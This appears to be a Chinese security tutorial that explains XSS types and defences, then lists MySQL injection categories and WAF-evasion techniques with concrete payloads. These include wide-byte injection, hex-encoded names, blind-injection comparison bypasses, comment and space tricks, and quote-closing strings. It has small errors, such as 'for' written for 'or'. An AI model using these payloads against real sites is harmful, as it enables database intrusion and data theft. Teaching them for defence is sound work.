一、XSS攻击
概念:XSS攻击也被称为 "跨站脚本攻击",通过将恶意得Script代码注入到Web页面中,当 用户 浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击 用户的目的。
攻击对象:XSS攻击,攻击的不是网站,攻击的是访问网站的用户。
XSS攻击流程:
(1)将恶意的JavaScript代码镶嵌到网站中
(2)用户去访问这个被镶嵌了恶意的JavaScript代码的网站
(3)恶意的JavaScript代码被执行
(4)用户遭受到XSS攻击
XSS漏洞危害:
(1)盗取各种用户账号;
(2)窃取用户Cookie资料,冒充用户身份进入网站;
(3)劫持用户会话,执行任意操作;是指操作用户浏览器;
(4)刷流量,执行弹窗广告;
(5)传播蠕虫病毒。
5.三大主流类型XSS漏洞
XSS漏洞主要有三类,反射型,存储型,DOM型。
6. 反射型XSS-非持久型
反射型XSS是非持久性、参数型跨站脚本。反射型XSS的JS代码在web应用的参数 (变量)中,如 搜索框的反射型XSS。
反射型XSS代码常常出现在URL请求中,当用户访问带有XSS代码的URL请求时, 服务器端接收请求并处理,然后将带有XSS代码的数据返回给浏览器,浏览器解析该 段带有XSS代码的数据并执行,整个过程就像一次反射,故称为反射型XSS。
7. 存储型XSS-持久型
攻击者提交一段XSS代码后,服务器接收并存储,当其他用户访问包含该XSS代码的 页面时, XSS代码被浏览器解析并执行。
存储型XSS攻击的一个典型场景是留言板、博客和论坛等,当恶意用户在某论坛页面 发布含有恶 意的Javascript代码的留言时,论坛会将该用户的留言内容保存在数据 库或文件中并作为页面内 容的一部分显示出来。当其他用户查看该恶意用户的留言时, 恶意用户提交的恶意代码就会在用 户浏览器中解析并执行。
8.DOM型XSS攻击
DOM可以使程序和脚本能够动态访问和更新文档的内容、结构及样式 。HTML 的标签 都是节 点,而这些节点组成了 DOM 的整体结构即节点树。也就说我们可以通过Js 脚本修改html代码。
9. XSS漏洞总结
反射型XSS:主要体现在URL里,但是一次性的
存储型XSS:主要关注网站一些类似留言框,评论的地方
DOM型XSS:与其说是XSS更像是逻辑漏洞,主要需要对前端代码进行审计,需要懂 js代码。
10.XSS攻击如何进行防御
(1).对前端输入做过滤和编码:
①.比如只允许输入指定类型的字符;
②.对特殊字符进行过滤和转义;
(2).对输出做过滤和编码:在变量值输出到前端的 HTML 时进行编码和转义;
(3).给关键 cookie 使用 http-only
注释:cookie是用户计算机中自带的一种文本文件。
功能:能够帮助网页识别用户,具有检测潜在的欺诈和滥用行为,用来保护用户安全。
二、MySQL注入漏洞
MySQL注入的攻击对象是:针对MySQL数据库的web应用程序
1.什么是MySQL注入漏洞
所谓的MySQL注入漏洞,就是将sql语句注入到web表单,或者输入页面请求的查询字符串 中。让服务器执行MySQL语句,从而达到欺骗服务器的效果。
2.MySQL注入漏洞的原理是什么?
MySQL注入漏洞分为平台层注入和代码层注入
平台层注入:是因为创建数据库时或者数据库本身存在漏洞。
代码层注入:代码层注入是因为程序员没有进行代码过滤,从而导致执行了非法的sql语句。
3.SQL注入分类及判断:
(1).按数据类型分为:数字型、字符型和搜索型
(2).按提交方式可分为GET型,POST型,Cookie型和HTTP请求头注入
(3).按执行效果有可以分为报错注入、联合查询注入、盲注和堆查询注入
(盲注又可分为基于bool的和基于时间的注入)
数字型注入查询语句为:SELECT * FROM user WHERE id=1;
搜索型注入为查询语句为:SELECT * FROM user WHERE search like '%1%';
4.常见的MySQL注入及其绕过技巧
(1).引号绕过
①.16进制绕过(会使用到引号的地方是在于最后的where子句中)。
下面这条语句就是一个简单的用来查选得到users表中所有字段的一条语句。
select column_name from information_schema.tables where table_name="users"
这个时候如果引号被过滤了,那么上面的where子句就无法使用了。要使用十六进制来处理这个 问题。users的十六进制的字符串是7573657273。
select column_name from information_schema.tables where table_name=0x7573657273
②.宽字节注入
宽字节注入使用场景是后台使用了一些例如addslashes()的安全函数来对单引号,
双引号和反斜线进行了转义,且编码是GBK的情况。
?id=1%df' union select ...
(2).逗号绕过
在使用盲注的时候,需要使用到substring(),mid(),limit。这些子句方法都需用到逗号。对于 substring()和mid()这两个方法可以使用from to的方式来解决:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
对于limit可以使用offset来绕过:
select * from news limit 0,1
等价于下面这条SQL语句
select * from news limit 1 offset 0
(3).比较符(<,>)绕过
同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找
如果无法使用比较操作符,那么就需要使用到greatest来进行绕过。
最常见的一个盲注的sql语句。
select * from users where id=1 and
ascii(substr(database(),0,1))>64
此时如果比较操作符被过滤,盲注语句则无法使用,那么就可以使用greatest来代替比较操作符 了。greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。
那么上面的这条sql语句可以使用greatest变为如下的子句:
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
(4).空格绕过
空格绕过可以使用其他字符来代替空格
/**/ 注释代替空格 ; ()括号绕过空格;
编码 %a0,%0b ; ``(Tab上边的键)
select/**/*from/**/users;
select(username)from(users); # 注意:括号里不能有*
select%a0from%a0users;
select`*`from`users`;
(5).随机大小写绕过(例如过滤select关键字)
SelECt * from users;
(6).双写关键字绕过(适用于waf通过正则表达式将select等关键字过滤为空的情况)
seleselectct * from users;
(7).内联注释绕过(内联注释是把union、select等关键字放在/*!...*/里绕过waf检测)
/*!select*/ * from users;
(8).注释绕过(mysql的注释符号有:--空格、#、/**/)
一些waf会将注释符号过滤,这时候可以用诸如and '1' ='1'来闭合SQL语句
引号闭合,$id传值 1' and '1'='1
select username,password from users where id = '$id'
#上面的sql语句变成了这样
select username,password from users where id ='1' and '1'='1'
(9).and or关键字绕过(替换法)
and ==> &&
for ==> ||